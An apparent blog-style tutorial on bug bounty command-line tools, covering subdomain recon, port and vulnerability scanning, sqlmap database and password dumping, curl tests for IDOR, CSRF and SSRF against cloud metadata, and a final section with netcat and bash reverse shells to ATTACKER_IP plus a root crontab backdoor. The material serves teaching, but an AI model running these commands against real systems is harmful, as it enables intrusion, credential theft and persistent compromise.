Listen to this Post
Introduction:
The landscape of web application security is a constant arms race between defenders and attackers. As showcased by a recent 60-hour intensive ethical hacking course completion, mastering a core set of tools and commands is paramount for both finding vulnerabilities and understanding how to fix them. This article provides a hands-on guide to the essential command-line utilities that power modern bug bounty hunting and penetration testing.
Learning Objectives:
- Execute fundamental reconnaissance and vulnerability scanning commands using industry-standard tools.
- Identify and exploit common web application vulnerabilities like SQL Injection and XSS from the command line.
- Utilize command-line tools for post-exploitation activities and maintaining access.
You Should Know:
- The Art of Web Reconnaissance with Subdomain Enumeration
Before attacking, you must map the target’s attack surface. Subdomain enumeration is a critical first step.Using subfinder subfinder -d target.com -o subdomains.txt Using amass (passive mode) amass enum -passive -d target.com -o subdomains_amass.txt Sorting and combining results cat subdomains.txt subdomains_amass.txt | sort -u > final_subdomains.txt
Step-by-step guide: These commands use passive reconnaissance techniques to discover subdomains without directly interacting with the target’s servers. `Subfinder` uses various public sources and APIs, while `amass` in passive mode gathers data from certificates, archives, and search engines. The final command merges and deduplicates the results into a single file for further analysis. Always ensure you have explicit permission before running these against any domain.
2. Identifying Live Hosts and HTTP Services
With a list of subdomains, the next step is to determine which are active and what services they are running.
Using httpx to probe for live HTTP/HTTPS servers cat final_subdomains.txt | httpx -silent -o live_subdomains.txt Using naabu for fast port scanning on a specific target naabu -host target.com -top-ports 100 -o ports.txt Using nmap for detailed service enumeration on a found host nmap -sV -sC -O -p- 192.168.1.100 -oA detailed_scan
Step-by-step guide: `Httpx` takes your list of subdomains and quickly checks which ones resolve to a live web server. `Naabu` is a fast port scanner written in Go, ideal for quickly checking common ports. For a more in-depth analysis, `Nmap` is the industry standard. The `-sV` flag probes open ports to determine service/version info, `-sC` runs default scripts, and `-oA` outputs results in all major formats. This process helps prioritize targets based on exposed services.
3. Automated Vulnerability Scanning with Nuclei
Nuclei uses community-powered templates to scan for thousands of known vulnerabilities.
Basic scan with all templates nuclei -u https://target.com -o nuclei_results.txt Scan with only critical severity templates nuclei -u https://target.com -severity critical -o critical_findings.txt Scanning a list of URLs from recon cat live_subdomains.txt | nuclei -t /path/to/nuclei-templates/ -o full_scan_results.txt
Step-by-step guide: Nuclei is a powerful and fast scanner. The first command runs a basic scan against a single URL. The `-severity` flag allows you to filter results by criticality, which is crucial for triaging findings in a time-sensitive bug bounty environment. The final command pipes a list of live subdomains into Nuclei, allowing for automated scanning of an entire target’s surface area. Always update your nuclei templates (nuclei -update-templates) before a scan.
4. Exploiting SQL Injection with SQLMap
SQLMap automates the process of detecting and exploiting SQL injection flaws.
Basic test for GET parameter vulnerability sqlmap -u "https://target.com/page.php?id=1" --batch Test for POST data injection (using a request file) sqlmap -r request.txt --batch Attempt to dump the database after confirming injection sqlmap -u "https://target.com/page.php?id=1" --batch --dump Enumerate database users sqlmap -u "https://target.com/page.php?id=1" --users --passwords
Step-by-step guide: SQLMap is the definitive tool for finding and exploiting SQLi. The `-u` flag specifies the target URL. The `–batch` option runs the tool in non-interactive mode, using default choices. For POST requests, it’s often easier to save the raw HTTP request to a file and use the `-r` flag. The `–dump` command attempts to extract entire databases, while `–users` and `–passwords` focus on credential enumeration. Use strictly in authorized environments only.
- Manipulating Sessions with curl for Broken Access Control & IDOR
The command-line tool `curl` is invaluable for testing authentication and authorization flaws by manually crafting HTTP requests.Testing for IDOR by changing a user ID parameter while using a stolen session cookie curl -H "Cookie: session=stolen_session_value" https://target.com/user/12345/profile Testing for Broken Access Control by accessing an admin endpoint with a user role curl -H "Cookie: session=user_session" https://target.com/admin/dashboard Testing for CSRF token bypass by sending a blank token curl -X POST -d "action=delete&userid=123&csrf_token=" -H "Cookie: session=valid_session" https://target.com/delete
Step-by-step guide: These `curl` commands manually craft requests to test common logic flaws. The first tests for Insecure Direct Object Reference (IDOR) by attempting to access another user’s data by altering the ID in the URL. The second tests for Broken Access Control by trying to reach an admin panel with a non-admin user’s session cookie. The third checks if the application validates CSRF tokens by submitting an empty one. Analyze the HTTP response codes and content to determine vulnerability.
-
Web Server Attack: Testing for Server-Side Request Forgery (SSRF)
SSRF forces a server to make requests to internal or third-party resources.Using curl to test for basic SSRF by trying to access internal metadata endpoints curl -X POST "https://target.com/export?url=http://169.254.169.254/latest/meta-data/" Testing for blind SSRF by calling an external burp collaborator URL curl -X POST "https://target.com/export?url=http://yourburpcollaborator.net" Testing for DNS rebinding attacks with a non-routable IP curl -X POST "https://target.com/export?url=http://127.0.0.1:8080/admin"
Step-by-step guide: These commands test an application feature that makes a web request on the user’s behalf (e.g., an “export URL” function). The first test tries to access a cloud provider’s internal metadata API, which is a common target. The second uses a Burp Collaborator URL to test for “blind” SSRF where the response isn’t returned directly. The third tests access to the server’s own localhost. Observe the application’s responses or check your collaborator for DNS/HTTP interactions to confirm the vulnerability.
7. Post-Exploitation: Establishing a Reverse Shell
Upon finding a vulnerability like command injection, the goal is often to establish a persistent connection back to the attacker’s machine.
On the attacker's machine, set up a netcat listener nc -nvlp 4444 On the target (via command injection vulnerability), use a bash reverse shell bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1 Alternative using netcat if available on the target nc ATTACKER_IP 4444 -e /bin/bash For persistent access, create a simple backdoor with a cron job echo " root nc ATTACKER_IP 4444 -e /bin/bash" >> /etc/crontab
Step-by-step guide: This is a critical post-exploitation technique. First, the attacker sets up a listener on their local machine on port 4444 using netcat. Then, by exploiting a command injection flaw (e.g., in a web form), they inject a command that forces the target server to execute a reverse shell. This shell connects back to the listener, giving the attacker command-line access. The final command adds a cron job for persistence, executing the reverse shell every minute. This must only be performed in sanctioned lab environments.
What Undercode Say:
- Tool Proficiency is Not Mastery: Knowing 25 commands is a starting point, but true expertise lies in understanding the underlying protocols (HTTP/S, TCP) and knowing which tool to use, and when, based on the specific context of the target.
- The Defender’s Mindset is the Ultimate Skill: The most successful ethical hackers can rapidly switch between an attacker’s mindset to find flaws and a defender’s mindset to understand root cause and implement effective mitigations.
The completion of a course like the one described signals a solid foundation in tool usage. However, the evolving nature of web technologies (APIs, serverless architectures) means the specific commands will change. The core analytical thinking process—reconnaissance, vulnerability identification, exploitation, and mitigation—is the permanent, high-value skill. The future of bug hunting will be less about memorizing `sqlmap` flags and more about automating complex attack chains and reasoning about business logic flaws that scanners cannot find.
Prediction:
The increasing complexity of web applications, fueled by APIs and microservices, will shift the focus of bug bounty hunting from classic vulnerabilities like simple SQLi and XSS towards more intricate attack chains involving authorization flaws, server-side business logic bypasses, and vulnerabilities within the architecture itself. Success will depend on a hunter’s ability to automate reconnaissance at scale and creatively chain lower-severity issues into a critical exploit path, making deep technical knowledge and automation skills more valuable than ever.
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: https://lnkd.in/p/dTybNFng – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
